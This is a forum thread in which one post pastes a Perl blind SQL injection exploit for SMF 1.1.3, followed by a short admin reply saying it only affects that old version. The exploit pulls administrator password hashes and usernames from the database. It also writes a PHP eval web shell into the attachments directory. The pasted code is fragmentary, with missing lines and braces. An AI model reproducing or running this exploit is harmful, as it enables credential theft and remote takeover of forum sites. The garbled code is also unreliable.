Facebook  Twitter 




+- User Information

Welcome, Guest.
Please login or register.
Forgot your password?

+- Forum Stats

Total Members: 11809
Latest: Rheingauner
New This Month: 1
New This Week: 0
New Today: 0
Total Posts: 41640
Total Topics: 7280
Most Online Today: 92
Most Online Ever: 2482
(April 09, 2011, 07:02:45 pm)
Users Online
Members: 0
Guests: 35
Total: 35

Author Topic: help sql injection  (Read 3373 times)

0 Members and 1 Guest are viewing this topic.

Offline jacktheripper

  • Member
  • *
  • Posts: 1
    • View Profile
help sql injection
« on: February 12, 2009, 01:45:23 am »

#Written By Michael Brooks
#contact: th3(dot)r00k(at)gmail(dot)com

#SMF 1.1.3 Extremely fast Blind SQL Injection Exploit!
# -Binary Search
# -Multi-Threaded
# -NO benchmark()'s
#Two SQL Injection flaws.
#Works with magic_quotes_gpc=On or Off.
#Total Bypass of SMF's SQL Injection filter.

#I submitted a patch for these flaws:

#I would like to thank RetroGod for being so skilled and willing to help me out.

#**Warning** perl will somtimes seg fault when useing threads.
#Tested Under Linux

use LWP::UserAgent;
use threads;
use Thread::Semaphore;

#global variables
my $threads=1;
my $semaphore = new Thread::Semaphore;
my $globPos : shared=1;
my $oper : shared;
my @result : shared;
my $target;
my $cookie=false;


main();#execute main
sub main{
#Process arguments passed by the command line.
if(substr($ARGV[$v],0,1) eq '-'){

print "\nExample:\n";
print "\nbrooks@TheLab:~/code/exploits\$ ./smf_blind_sql.pl -p -u admin -t -n 4 -c SMFCookie218=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A40%3A%22091feddbd31bfa96932a5e4e6c34cb36f2686c1a%22%3Bi%3A2%3Bi%3A1378168836%3Bi%3A3%3Bi%3A1%3B%7D
\n\nSMF Is Vulnerable!
Finding Password Hash for the Name: 'admin'
Please Standby...

Password Hash:
This attack used 161 HTTP requests and took 8 seconds to complete.
if($n != 1){
#Check to make sure the target is vulnerable
#Yes I am assuming the default table prefix, its a shame you can't access information_schema.
#No prefix is needed for the non-cookie attack becase I do not need a union select or sub-select!
bin_finder(2,1,"1","smf_members","and 1!=1");
bin_finder(2,1,"1","smf_members","and 1=1");
print "SMF Is Vulnerable!\n"
print "\nATTACK FAILED!\n\n";
print "Try sending a private message to your self or SMF might be patched.\n"
print "The non-cookie attack requires MySQL 5 so try using the exploit with -c or SMF might be patched.\n"

if($user != 1){
print "Finding Password Hash for the Name: '$user'\n Please Standby...\n";
for(my $x=0;$x<$threads;$x++){
#@threads[$x]=new threads \&bin_finder,16,40,"(conv(SUBSTRING(passwd,%s,1),16,10))=%s", "smf_members"," and memberName = '".$user."'";
@threads[$x]=new threads \&bin_finder,16,40,"conv(SUBSTRING(passwd,%s,1),16,10)", "smf_members"," and memberName =". hex_encode($user);
for(my $x=0;$x<$threads;$x++){
print "\nPassword Hash:\n";
foreach $y (@result){
print sprintf("%x",$y);
print "Finding An Administrative Credental.\n Please Standby...\n";
#bin_finder(128 ,1,"count(memberName)","smf_members"," and ID_GROUP=1 ");#single thread
#print "There are $admin_count admins on this forum.\n";
for(my $x=0;$x<$threads;$x++){
@threads[$x]=new threads \&bin_finder,16,40,"conv(SUBSTRING(passwd,%s,1),16,10)", "smf_members"," and ID_MEMBER=1 ";
for(my $x=0;$x<$threads;$x++){
print "\nPassword Hash:\n";
foreach $y (@result){
print sprintf("%x",$y);
bin_finder(256,1,"char_length(memberName)","smf_members"," and ID_MEMBER=1 ");#single thread

@threads[$x]=new threads \&bin_finder,128,$name_len,"ASCII(SUBSTRING(memberName,%s,1))", "smf_members"," and ID_MEMBER=1 ";
print "\nName:\n";
print sprintf("%c",@result[$l]);
print "\n";
die("\nA cookie is needed for this attack!\n");
print "Determining the exact path to place the backdoor. \n Please standby...\n";
bin_finder(512,1,"char_length(value)","smf_settings"," and variable = 'attachmentUploadDir'");#single thread
for(my $x=0;$x<$threads;$x++){
@threads[$x]=new threads \&bin_finder,128,$length,"ASCII(SUBSTRING(value,%s,1))", "smf_settings"," and variable = 'attachmentUploadDir'";

for(my $x=0;$x<$threads;$x++){
print "Path Disclosed:";
foreach $y (@result){
$path.=sprintf("%c" ,$y);
print $path."\n";
#$path=~s/_/?/g;#This accounts for the search request being modfied by SMF.
$r=rand();#Random file name so the attack will succeed multiple times against the same target.
my $ua = LWP::UserAgent->new;
$ua->default_header("Cookie"=>$cookie);#Its tricky to get double quotes for the outfile statement.
$load="\\,union select ".hex_encode("<?php eval($_GET[e]);?>").' into outfile "","'.$path.'/'.$r.'.php",""#';
$tst= $ua->post($target."?action=pm;sa=search2",["advanced"=>"1","search"=>"1","searchtype"=>"1","userspec"=>$load,"minage"=>"0","maxage"=>"9999","sort"=>"ID_PM%7Cdesc","submit"=>"Search"]);
print "\nEval Backdoor:\n".$target."attachments/".$r.".php?e=phpinfo();\n"
print "A Very Fast Blind Sql Injection Exploit for SMF 1.1.3.\n\n";
print "-p obtain passwords (if used without -u, then an admin credential will be obtained)\n";
print "-b installs a backdoor using 'into outfile'. (requires -c) **WARNING** SMF will log this as a single 'Hacking Attempt'!\n";
print "-t target\n";
print "-c A valid cookie(Much faster attack)\n";
print "\nAditional:\n";
print "-u obtains the password for a user name\n";
print "-n number of threads\n";
print "-e Shows an Example.\n"
print "The password hash is generated as:\n";
print "sha1(strtolower($username) . $password);\n";
print "\nThis attack used $oper HTTP requests and took $t seconds to complete.";
print "\nEOF\n";

#Takes complex input to build the request, returns a simple bool.
sub bin_ask{
my $if = shift;
my $table=shift;
my $where = shift;
my $ua = shift;
my $f=0;
#no union select or sub-select needed for this attack!
#$where="and realName = ".hex_encode("admin");
$load="\"\\\",\" or (IF(".$if.",sleep(10),1) $where) limit 1,1 #\"";
$load=~s/_/?/g;#This accounts for the search request being modfied by SMF.
$tst= $ua->post($target."?action=search2",["advanced"=>"1","search"=>"1","searchtype"=>"1","userspec"=>$load,"minage"=>"0","maxage"=>"9999","sort"=>"relevance%7Cdesc","brd%5B1%5D"=>1,"submit"=>"Search"]);
$page= $tst->content;
#print "<br>page:".$page;die;
$t= time();
#print "\n 1:time\n".$t."\n\n";
}else{#%sunion select bypasses SMF's filter so i can use a sub-select in the following query.
$load="\\,union select ".hex_encode("1)) or (1!=\"'\") and (select (IF((".$if."),true,false)) from ".$table." where 1 ".$where.") or (1!=\"'\") and pmr.ID_MEMBER = 1#'").' # ';#sql comments still work in SMF
$tst= $ua->post($target."?action=pm;sa=search2",["advanced"=>"1","search"=>"1","searchtype"=>"1","userspec"=>$load,"minage"=>"0","maxage"=>"9999","sort"=>"ID_PM%7Cdesc","submit"=>"Search"]);
$page= $tst->content;
#print $page; die ;
if(index($page,"No Messages Found")==-1){
return $f;

#worker thread
sub bin_finder{
my $base=shift;
my $length=shift;
my $question=shift;
my $table=shift;
my $where=shift;
#One UserAgent object is used per thread.
my $ua = LWP::UserAgent->new;

#binary search:
my $n=$base-1;
my $low=0;
my $floor= $low;
my $high=$n-1;
my $pos= $low+(($high-low)/2);
my $f=1;
$great="GREATEST(".sprintf($question,$c).",".$pos.")!=".$pos;#bypass the filter for the < and > characters
$less ="LEAST(".sprintf($question,$c).",".$pos.")!=".$pos;
if(bin_ask($great, $table,$where,$ua)){#asking the sql database if the current value is greater than $pos
if($pos==$n-1){#if this is true then the value must be the modulus.
#print "\nDBG found:$c:ascii:".sprintf('%c',$pos)."\n";
}elsif(bin_ask($less, $table,$where,$ua)){#asking the sql database if the current value is less than $pos
if($pos==$floor+1){#if this is true the value must be zero.
#print "\nDBG found:$c:ascii:".sprintf('%c',$pos)."\n";
#both greater than and less then where asked, so thats two http requests.
#print "\nDBG found:$c:ascii:".sprintf('%c',$pos)."\n";,,
#hex_encode was ported from one of RetroGod's php exploits.
#Thanks be to rGod for telling me about this encoding method on milw0rm's forum back when it was still up.
#rGot you are leet!
sub hex_encode{
my $my_string=shift;
my $encoded="0x";
my $len=length($my_string);
for ($k=0; $k<$len; $k++){
if (length($temp)==1) {
return $encoded;


Offline SMFHacks

  • Administrator
  • Hero Member
  • *****
  • Posts: 15765
    • View Profile
Re: help sql injection
« Reply #1 on: February 12, 2009, 07:16:26 am »
That is only for old version's of SMF 1.1.3
Get your Forum Ranked! at https://www.forumrankings.net - find out how your forum compares with others!

Like What I do? Support me at https://www.patreon.com/vbgamer45/


+- Recent Topics

Logo and Category? by tank_fv101
January 10, 2022, 08:03:11 am

Questions about SMF Gallery Pro Folders and Gallery URL by scso1502
January 05, 2022, 03:48:27 pm

$subcats_linktree by mickjav
January 05, 2022, 03:08:29 pm

New Photos Won't Upload - Gallery Pro 8.0 or 9.0b - Old Photos Still Visible by scso1502
January 05, 2022, 02:23:16 pm

Additional Recommendations for SMF Store by SMFHacks
January 03, 2022, 02:37:10 pm

Seasons Greetings by SMFHacks
December 24, 2021, 10:02:42 pm

Problems with the contact mod by SMFHacks
December 22, 2021, 09:16:24 am

Gallery Pro v8.0 and PHP 7.4 by SMFHacks
December 16, 2021, 01:34:03 pm

Thanks mod SMF 2.1 by Monocero
November 27, 2021, 01:13:01 pm

How to change the font on a photo in SMF Gallery Pro? by SMFHacks
November 18, 2021, 09:28:11 am

Powered by EzPortal